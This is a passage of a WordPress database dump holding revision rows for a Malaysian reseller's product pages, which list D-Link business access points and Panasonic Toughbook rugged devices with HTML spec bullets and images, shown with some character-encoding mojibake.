02:38:29','',1571,'https://bintara.com.my/blog/2018/12/20/1571-revision-v1/',0,'revision','',0),(2632,1,'2018-12-20 11:53:53','2018-12-20 03:53:53','<h3>D - Link Business Solution Product </h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Point</h4>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Point</h4>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Point</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>- Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>- Weather-proof design (IPX6) built to withstand harsh environments</p><p>- Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>- Provides WLAN partitioning for deployments such as wireless hot spots</p><p>â€¢ Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>â€¢ Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>â€¢ Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>â€¢ Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>â€¢ Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>â€¢ Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>â€¢ Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>â€¢ RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>â€¢ Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p>		\n			<h4>N600 Wireless Dual-Band PoE Access Point</h4>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Point</h4>		\n			<h4>N300 Wireless PoE Access Point</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2018-12-20 11:53:53','2018-12-20 03:53:53','',1480,'https://bintara.com.my/blog/2018/12/20/1480-revision-v1/',0,'revision','',0),(2630,1,'2018-12-20 11:31:37','2018-12-20 03:31:37','<h3>D - Link Business Solution Product </h3>		\n		<p>Â </p><table><tbody><tr><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" width=\"500\" height=\"500\" /></p><p>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Point</p><p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"1\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" width=\"510\" height=\"600\" /></p><p>2.4GHz Wireless N300 Outdoor Access Point</p><p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>- Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>- Weather-proof design (IPX6) built to withstand harsh environments</p><p>- Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>- Provides WLAN partitioning for deployments such as wireless hot spots</p><p>[maxbutton id=\"1\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" width=\"510\" height=\"600\" /></p><p>AC1750 Wireless Dual-Band PoE Access Point</p><p>â€¢ Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>â€¢ Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>â€¢ Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>â€¢ Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>â€¢ Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>â€¢ Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>â€¢ Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>â€¢ RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>â€¢ Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><p>[maxbutton id=\"1\" ]</p></td></tr><tr><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" width=\"510\" height=\"600\" /></p><p>N600 Wireless Dual-Band PoE Access Point</p><p>â€¢ Simultaneous Dual Band Connectivity for high performance</p><p>â€¢ SupportÂ  up toÂ  300 Mbps speedÂ  in both 2.4 GHz and 5 GHz band</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet support</p><p>â€¢ Support Multiple operation mode â€“ AP, Client, WDS, WDS with AP</p><p>â€¢ Equipped with Rugged Metal &amp; Plenum-rated housing</p><p>â€¢ Built in Radius server and support Network Access Protection (NAP)</p><p>â€¢ Support Rogue AP Detection, Wireless Broadcast Scheduling</p><p>â€¢ Support Central Wi-Fi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"1\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" width=\"510\" height=\"600\" /></p><p>AC1300 Wireless Dual-Band PoE Access Point</p><p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"1\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" width=\"510\" height=\"600\" /></p><p>N300 Wireless PoE Access Point</p><p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"1\" ]</p></td></tr></tbody></table>		\n			<h2>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Point</h2>		\n			<h2>2.4GHz Wireless N300 Outdoor Access Point</h2>		\n			<h2>AC1750 Wireless Dual-Band PoE Access Point</h2>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>- Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>- Weather-proof design (IPX6) built to withstand harsh environments</p><p>- Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>- Provides WLAN partitioning for deployments such as wireless hot spots</p><p>â€¢ Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>â€¢ Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>â€¢ Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>â€¢ Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>â€¢ Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>â€¢ Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>â€¢ Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>â€¢ RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>â€¢ Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p>		\n			<h2>N600 Wireless Dual-Band PoE Access Point</h2>		\n			<h2>AC1300 Wireless Dual-Band PoE Access Point</h2>		\n			<h2>N300 Wireless PoE Access Point</h2>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2018-12-20 11:31:37','2018-12-20 03:31:37','',1480,'https://bintara.com.my/blog/2018/12/20/1480-revision-v1/',0,'revision','',0),(2619,1,'2018-12-20 11:04:44','2018-12-20 03:04:44','[vfb id=3]','Get Quotation (Panasonic Toughbook)','','publish','closed','closed','','get-quotation-panasonic-toughbook','','','2018-12-20 11:07:09','2018-12-20 03:07:09','',0,'https://bintara.com.my/?page_id=2619',0,'page','',0),(2627,1,'2018-12-20 11:17:44','2018-12-20 03:17:44','<h3>Computer Toughbook</h3>		\n			<h4>TOUGHBOOK 33</h4>		\n			<h4>TOUGHBOOK 31</h4>		\n			<h4>TOUGHBOOK 54</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>[maxbutton id=\"5\" ]</p><header></header>PRODUCT DETAILS<p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>[maxbutton id=\"5\" ]</p><h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 20</h4>		\n			<h4>TOUGHPAD FZ-Q2</h4>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>[maxbutton id=\"5\" ]</p><h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Handhelds</h3>		\n			<h4>TOUGHBOOK T1</h4>		\n			<h4>TOUGHBOOK N1</h4>		\n			<h4>TOUGHPAD FZ-X1</h4>		\n										<img width=\"277\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg 277w, https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1-214x300.jpg 214w\" sizes=\"(max-width: 277px) 100vw, 277px\" />											\n										<img width=\"416\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg 416w, https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1-300x281.jpg 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" />											\n										<img width=\"210\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png 210w, https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero-162x300.png 162w\" sizes=\"(max-width: 210px) 100vw, 210px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ®Â T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOKÂ name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users wonâ€™t miss a beat with its great battery life, glove and rain touch enabled 5\" screen, 5 foot drop rating and IP66 and IP68 certification.Â  The TOUGHBOOKÂ T1 is ready to be used by satisfied end users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p><h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® N1 â€” a powerful, slim and fully rugged handheld. Itâ€™s the all-in-one tool youâ€™ve been waiting for, and itâ€™s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you wonâ€™t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Androidâ„¢ operating system,Â giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, donâ€™t worry â€” it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.</p><p>[maxbutton id=\"5\" ]</p><h5>PRODUCT DETAILS</h5><p>The TOUGHPADÂ® FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.Â Thirty minutes of under five feet of water rugged.Â Ten foot drops onto solid concrete rugged. Built-in heater for -4Â° F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Tablets</h3>		\n			<h4>TOUGHBOOK L1</h4>		\n			<h4>TOUGHPAD FZ-M1</h4>		\n			<h4>TOUGHPAD FZ-G1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n										<img width=\"584\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg 584w, https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10-300x200.jpg 300w\" sizes=\"(max-width: 584px) 100vw, 584px\" />											\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Androidâ„¢ OS basedÂ 7\" tablet that proudly carries the TOUGHBOOKÂ name. Its ability to be usedÂ in the enterprise to collect information from workers in retail stores,Â warehouses field service, transportation and delivery or many otherÂ environments where work must occur belies its mild looking exterior.Â The TOUGHBOOK L1 has a quad-core processor and optional straight-shootingÂ barcode reader from portrait to landscape, use a stylus pen or connectÂ to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.Â This tabletâ€™s users wonâ€™t miss a beat with its great battery life, glove andÂ rain touch enabled 7\" screen, 5 foot drop rating and IP65 and IP67Â certification. The TOUGHBOOK L1 is ready to be used by satisfied endÂ users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p><h5>PRODUCT DETAILS</h5><p>The Panasonic FZ-M1 is the fully rugged WindowsÂ® tablet, built toÂ enable mission-critical mobile worker productivity without compromise. PoweredÂ by WindowsÂ® 10 Pro, the FZ-M1 features a long life, user-replaceableÂ battery and a daylight-readable, high-sensitivity multi-touch display for useÂ with heavy gloves. With the broadest range of configuration options available inÂ its class, the highly customizable FZ-M1 is the ideal tool for todayâ€™sÂ mobile workforce. In addition to the highly configurable options, added modelsÂ of Thermal Camera, Real Sense Camera, RTK/GPS, as well as several more.Â Allows the FZ-M1 to be the most comprehensive 7\" tablet in the market.</p><p>[maxbutton id=\"5\" ]</p><h5>PRODUCT DETAILS</h5><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experienceÂ while providing crucial port connectivity and feature-rich options in a compactÂ size. Designed for highly mobile field workers, itâ€™s the thinnest and lightestÂ fully rugged 10.1\" tablet running Windows 10 Pro 64-Bit. Powered by anÂ IntelÂ® Coreâ„¢ i5 vProâ„¢ processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobileÂ computing. Add to that an HD daylight-readable 10-point gloved multi touch +Â waterproof digitizer pen, and it becomes an essential tool for field workers.Â With added Thermal camera and IR camera options.Â  Can also support \"Windows Hello\" for enhanced security.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-A2</h4>		\n			<h4>TOUGHPAD FZ-B2</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n										<img width=\"400\" height=\"334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png 400w, https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero-300x251.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" />											\n		<h5>PRODUCT DETAILS</h5><p>With the Android 6.0 (Marshmallow) operating system and IntelÂ® x5-Z8550 processor, the Panasonic TOUGHPADÂ® A2 10.1-inch fully rugged Androidâ„¢ tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPADÂ FZ-A2 tablet is up to the task.</p><p>[maxbutton id=\"5\" ]</p><h5>PRODUCT DETAILS</h5><p>The rugged, 7-inch Panasonic TOUGHPADÂ® FZ-B2, now powered by Androidâ„¢ 6.0.1 (Marshmallow) and the latest IntelÂ® AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options â€“ at a price within reach of any business â€“ the TOUGHPADÂ FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPADÂ FZ-B2 is built for long-lasting durability where others fail.</p><p>[maxbutton id=\"5\" ]</p>','Panasonic Toughbook 